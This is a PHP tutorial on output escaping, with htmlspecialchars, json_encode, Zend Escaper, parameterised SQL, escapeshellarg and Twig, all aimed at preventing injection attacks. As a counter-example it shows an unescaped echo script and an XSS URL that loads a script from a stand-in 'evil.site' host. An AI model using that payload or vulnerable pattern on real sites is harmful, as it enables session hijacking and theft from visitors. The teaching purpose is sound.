Safer PHP output

Most PHP scripts produce output of some kind. When you produce that output, you need to make sure that your output is properly escaped, whether you're making an HTML page, an XML file or a JSON feed. PHP can't do this automatically, so you need to know what output escaping is, and how, when and why to do it.

To understand output escaping, it's useful to know how HTML works. The M stands for Mark-up; in other words, an HTML file contains both content and commands. The commands mark up sections of content – as headings, bold text, or scripts – or they embed special characters, images, or scripts. To separate content and commands, HTML reserves three characters: <, >, and &. HTML tags are wrapped with the < and > characters, which means you can't use them for anything else.

So what if you want to write < or > in your content? You need to use HTML entities. These are commands that embed special characters. Specifically these four entities:

Character   Entity name    Entity code
<           Less-than      &lt;
>           Greater-than   &gt;
&           Ampersand      &amp;
"           Double-quote   &quot;

There are about 250 other named entities (and numeric ones too), but if you use UTF-8 these are the only four HTML entities you'll ever need.

So when you output into an HTML page with PHP, you need to convert <, >, and & in your output into the HTML entities for those characters, otherwise you'll either trip up the parser (breaking your layout), or worse, insert HTML commands where you don't mean to. There's a whole class of attacks that exploit non-escaped output: they're called cross-site scripting attacks (or XSS for short; CSS was already taken!)
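As a quick illustration of that conversion, here is a minimal sketch using PHP's htmlspecialchars() function, which is covered in more detail further down. The sample string is made up for the example.

```php
<?php
// Hypothetical sample content containing all four special characters.
$raw = '<b>Tom & "Jerry"</b>';

// ENT_COMPAT converts <, >, & and double quotes; single quotes are left alone.
$escaped = htmlspecialchars($raw, ENT_COMPAT, 'UTF-8');

echo $escaped, "\n";
// prints: &lt;b&gt;Tom &amp; &quot;Jerry&quot;&lt;/b&gt;
```

The browser displays the escaped string as the original text, rather than treating the tags as commands.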

The anatomy of an XSS attack

Here's a terrible script:

<?php
$name = $_GET['name'];  
echo "Hi $name!";

It's terrible for two reasons: the first is that the input isn't filtered. You can read about doing that here. The second is that the output isn't escaped. This means that someone can create a URL like http://example.com/yourscript.php?name=<script src="http://evil.site/evil.js"></script> and then send that URL to someone else.

When they click on it, the remote script is run on your page in the visitor's web browser. It has access to everything that visitor does on your site. If they're logged in, then that script can steal or set cookies (allowing an attacker to hijack a login session), and it can perform actions using the visitor's login (like ordering a product to a different address, creating a new user, etc – much the same damage as the related class of attack called "cross-site request forgery"). It can change the HTML of your page to add forms and links that ask for personal and financial details. In short, it's bad news. But it's also easy to avoid.

Basic HTML escaping

The first thing to do is to filter your input. Names will never need to contain HTML tags, so just use the FILTER_SANITIZE_STRING filter, and it'll remove HTML and PHP tags (it isn't the filter that filter_input() applies by default, so you have to ask for it, and it's deprecated as of PHP 8.1). The second thing to do is to escape your output using the htmlspecialchars() function. Either approach will help on its own, but you should always use both.

<?php
$name = filter_input(INPUT_GET, 'name', FILTER_SANITIZE_STRING);
echo 'Hi '. htmlspecialchars($name, ENT_COMPAT, 'UTF-8');

The second argument in the htmlspecialchars() call is ENT_COMPAT. I've used that because it's a safe default: it will also escape double-quote characters ". You only really need to do that if you're outputting inside an HTML attribute (like <img src="<?php echo htmlspecialchars($img_path, ENT_COMPAT, 'UTF-8'); ?>">). You could use ENT_NOQUOTES everywhere else. While I've got your ear: I know that technically you can use single-quotes in HTML 4 attributes (<br clear='all'>), but don't. It's horrible.
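To make the difference between the quote flags concrete, here is a small sketch comparing them on a made-up value. ENT_QUOTES isn't discussed above; it's included only to show what happens to single quotes.

```php
<?php
// Hypothetical value containing both kinds of quote.
$value = 'a "b" \'c\'';

$noquotes = htmlspecialchars($value, ENT_NOQUOTES, 'UTF-8');
$compat   = htmlspecialchars($value, ENT_COMPAT, 'UTF-8');
$quotes   = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');

echo $noquotes, "\n"; // a "b" 'c'
echo $compat, "\n";   // a &quot;b&quot; 'c'
echo $quotes, "\n";   // a &quot;b&quot; &#039;c&#039;
```

Inside a double-quoted attribute, the ENT_COMPAT result is the first one that can't break out of the attribute.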

Notice that you should specify the output encoding in the third argument. If you've never heard about character sets and encoding before, you're probably from a native English-speaking country, and you don't know how annoying they were until Unicode came along. The good news is that for pretty much anything you'd want to do in PHP, using UTF-8 consistently will deal with all those nasty little problems.

If you don't specify the encoding, the function will use the default, which could be ISO-8859-1 (before PHP 5.4), UTF-8 (from 5.4 onwards), or something else entirely (because you can't be sure how someone's PHP environment is configured or which version they're running). Providing the output encoding saves headaches now and in the future.

When to escape output

You might be tempted to escape variables when you load them in. Something like:

<?php
$name = htmlspecialchars(filter_input(INPUT_GET, 'name'), ENT_COMPAT, 'UTF-8');

Don't do this. Escape output when you're outputting, not before. Escaping output depends on the kind of output you're producing. What if you want to make a CSV file later? Or a JSON response to an AJAX script? Both need different kinds of escaping, and seeing a load of &lt;s in your Excel sheet isn't going to improve your day.

Also if you're coding well, the code that does stuff will be separate from the code that shows stuff on screen, and you'll be able to tell just by looking at your template whether your output has been escaped, instead of needing to trace a variable back all the way through your code.
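Here is a rough sketch of what "escape when you output" looks like in practice: one raw value, escaped differently for each kind of output. The value and the CSV column name are invented for the example.

```php
<?php
// Keep the raw value around; escape it only at the point of output.
$name = 'Tom & "Jerry"'; // hypothetical raw value, e.g. loaded from a database

// HTML context
$html = '<p>Hi ' . htmlspecialchars($name, ENT_COMPAT, 'UTF-8') . '!</p>';

// JSON context
$json = json_encode(array('name' => $name));

// CSV context: fputcsv() quotes the field and doubles embedded quotes.
$stream = fopen('php://memory', 'r+');
fputcsv($stream, array('name', $name), ',', '"', '\\');
rewind($stream);
$csv = stream_get_contents($stream);
fclose($stream);

echo $html, "\n", $json, "\n", $csv;
```

Had $name been run through htmlspecialchars() when it was loaded, the JSON and CSV output would both contain &amp; and &quot; where they don't belong.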

Other forms of output escaping

XML

Many XML libraries (like the built-in SimpleXML, DOMDocument and XMLWriter) will handle escaping for you. Check first though: double-escaping is embarrassing, but not escaping at all can be deadly.
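As one example of a library doing the escaping, here is a minimal XMLWriter sketch. It assumes the xmlwriter extension is enabled, and the element name and content are made up.

```php
<?php
// Assumes the xmlwriter extension is enabled (it usually is).
$writer = new XMLWriter();
$writer->openMemory();
$writer->startDocument('1.0', 'UTF-8');

// writeElement() escapes the text content for us; don't pre-escape it.
$writer->writeElement('name', 'Tom & <Jerry>');

$writer->endDocument();
$xml = $writer->outputMemory();

echo $xml;
```

Passing an already-escaped string to writeElement() would produce the double-escaping mentioned above.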

Javascript

PHP doesn't have a built-in way to escape Javascript, but you can cheat and use the json_encode() function. There are some important caveats:

  1. Make sure your output is a string. json_encode() does much more than just string conversion.
  2. JSON is always UTF-8, so make sure the page you're embedding it in is too.
  3. If you're setting a Javascript variable which will then be displayed as HTML, you need to use htmlspecialchars() and json_encode().
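A minimal sketch of the json_encode() approach follows. The JSON_HEX_* flags are my own addition rather than something the caveats above require; they are standard json_encode() options that keep <, >, &, ' and " out of the output, which is a sensible precaution when the result is embedded in a script element.

```php
<?php
// Hypothetical hostile value.
$name = '</script><script>alert("x")</script>';

// The JSON_HEX_* flags turn <, >, &, ' and " into \uXXXX escapes, so the
// encoded string can't close the surrounding script element early.
$flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;

// Cast to string first: json_encode() would happily encode arrays or objects too.
$js = json_encode((string) $name, $flags);

echo '<script>var name = ' . $js . ';</script>', "\n";
```

The encoded value already includes its surrounding quotes, so it goes into the script as-is.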

A much better idea is to use the Zend Escaper component from the Zend Framework. It's available as a Composer package so it's easy to install and easier to use:

<?php
use Zend\Escaper\Escaper;

$escaper = new Escaper('UTF-8');
echo $escaper->escapeJs($name);

As with json_encode(), if you're outputting a javascript string which will wind up as HTML on a page somewhere, you should escape the HTML too:

<?php
    echo $escaper->escapeJs( $escaper->escapeHtml($name) );

If you're using Twig templates (they're fantastic, by the way; highly recommended), then you can escape javascript safely like this:

{{ name | e('js') }}

Database (SQL)

You can escape SQL, but there's a much better alternative, which is to use so-called "parameterised queries". Most databases support these. In a parameterised query, you put placeholders in your SQL command where the data would normally go and then send the data separately, so there's never a chance that data can be mis-interpreted as a command (a class of attack known as "SQL injection"). The database (or database library) will safely combine the command and data itself. Prepared SQL statements with placeholders are safer than constructing the full SQL command yourself, and can be much quicker (especially if it's a statement that'll be run multiple times).

SQL injection attacks are among the worst kind of website security hole; they're easy to discover, easy to exploit, and the potential for damage is tremendous, especially if your database isn't properly secured.
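To show the idea without needing a database server, here is a small sketch using PDO with an in-memory SQLite database. It assumes the pdo_sqlite extension is available; the table and values are invented for the example.

```php
<?php
// Assumes the pdo_sqlite extension; an in-memory database keeps this self-contained.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (name TEXT)');
$pdo->exec("INSERT INTO users (name) VALUES ('alice'), ('bob')");

// The placeholder keeps the data out of the SQL command.
$stmt = $pdo->prepare('SELECT COUNT(*) FROM users WHERE name = :name');

// A classic injection attempt is treated as a plain (non-matching) name.
$stmt->execute(array(':name' => "alice' OR '1'='1"));
$hostileMatches = (int) $stmt->fetchColumn();
$stmt->closeCursor();

// The same prepared statement can be reused with different data.
$stmt->execute(array(':name' => 'alice'));
$aliceMatches = (int) $stmt->fetchColumn();

echo "hostile: $hostileMatches, alice: $aliceMatches\n"; // hostile: 0, alice: 1
```

Had the hostile string been concatenated into the SQL instead, the OR clause would have matched every row.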

I've got a separate article about using prepared statements in PDO and the Doctrine DBAL (which extends it). If you're not using one of these (or something that builds on them, like Doctrine ORM or Laravel's Eloquent ORM if you still think ActiveRecord is cool), then you're crazy.

Command-line tools

Obviously the potential for mischief when you expose the command-line to the web via your script is pretty high. If you can possibly avoid it (and most likely you can), then do. If you must, then use escapeshellarg() on each argument you pass to exec(), system() or the backtick operator.
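A minimal sketch of escapeshellarg() in use, with a made-up hostile filename. The command is only built and printed here, not run, and the quoting shown in the comment is what a Unix-like system produces.

```php
<?php
// Hypothetical hostile "filename".
$file = 'notes.txt; echo pwned';

// escapeshellarg() wraps the value in quotes so the shell sees one argument.
$command = 'ls -l ' . escapeshellarg($file);

echo $command, "\n"; // on a Unix-like system: ls -l 'notes.txt; echo pwned'
```

Without the escaping, the shell would run ls and then run echo pwned as a second command.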

Among the Symfony Process component's many nifty features, its ProcessBuilder class (available up to Symfony 3.4; it was removed in 4.0) will automatically prepare and escape a command for you:

<?php
use Symfony\Component\Process\ProcessBuilder;

$builder = new ProcessBuilder(array('ls', '-lsa'));
$builder->getProcess()->run();

Email

If you don't properly escape output for email headers, a moderately clever attacker can hijack the entire message and replace it with one of their own, sent to whoever they like. The easy way to avoid this is not to use PHP's built-in mail() function at all, and instead use something like Swift Mailer or Zend Mail.

Both Zend Mail and Swift Mailer offer huge advantages over the plain mail() function; for example they can handle attachments, easy HTML email, inline images and encrypted mail server connections, so safe output escaping is only one good reason to use them.
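To show what header injection relies on, here is a rough sketch of the kind of check a mail library does for you. safe_header_value() is a hypothetical helper written for this example, not part of PHP or either library, and it isn't a substitute for using one of them.

```php
<?php
// Hypothetical helper: refuse any header value containing a line break,
// because a line break is what lets an attacker start a new header.
function safe_header_value($value)
{
    if (preg_match('/[\r\n]/', $value)) {
        throw new InvalidArgumentException('Line breaks are not allowed in header values');
    }
    return $value;
}

$subject = safe_header_value('Hello there'); // passes through unchanged

try {
    // An injection attempt: the attacker tries to add a Bcc header.
    safe_header_value("Hello\r\nBcc: victim@example.com");
    $rejected = false;
} catch (InvalidArgumentException $e) {
    $rejected = true;
}

var_dump($rejected); // bool(true)
```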

Printing HTML

It's bad form to write PHP that writes HTML: it's harder to update your page layout, and it's harder to correctly escape your output. So avoid this:

<?php
echo "<a href=\"$url\">$name</a>"; 
?>

And instead do this:

<a href="<?php echo htmlspecialchars($url, ENT_COMPAT, 'utf-8'); ?>">
    <?php echo htmlspecialchars($name, ENT_NOQUOTES, 'utf-8'); ?>
</a>

If you're thinking that looks long, ugly and verbose, then … well, you're right. Use Twig instead, and you'll get a cleaner separation of code and templates, manual and automatic output escaping, and template inheritance that can really reduce the amount of work needed to update your site.

Installing Twig

Installing and setting up Twig is easy with the Composer PHP package manager. Download it with Composer:

composer require twig/twig

Twig setup

It's good practice to keep most of your code, templates and libraries out of your website's root folder, ideally in their own directories (src/, templates/ and so on) alongside web/.

Put most of your code in src/, and place just enough code in web/ to load and run that code. For the sake of a short example though, here's a basic web/example.php and templates/index.twig:
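A minimal sketch of what those two files might contain, assuming Twig 2 or later installed via Composer, with vendor/ and templates/ sitting alongside web/. The variable name and the template contents are illustrative, not a definitive setup.

```php
<?php
// web/example.php (sketch): load Composer's autoloader, then render a template.
require __DIR__ . '/../vendor/autoload.php';

// Look for templates in the templates/ directory next to web/.
$loader = new \Twig\Loader\FilesystemLoader(__DIR__ . '/../templates');

// 'autoescape' => 'html' makes Twig HTML-escape every {{ variable }} by default.
$twig = new \Twig\Environment($loader, array('autoescape' => 'html'));

$name = isset($_GET['name']) ? (string) $_GET['name'] : 'world';

echo $twig->render('index.twig', array('name' => $name));

// templates/index.twig would then contain something like:
//
//   <p>Hi {{ name }}!</p>
//
// With autoescaping on, a name such as <script> is output as &lt;script&gt;.
```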

Twig's easy to learn and use, and tremendously powerful. Read the documentation to get started.


Disclaimer

It should go without saying, but any example code shown on this site is yours to use without obligation or warranty of any kind. As far as it's possible to do so, I release it into the public domain.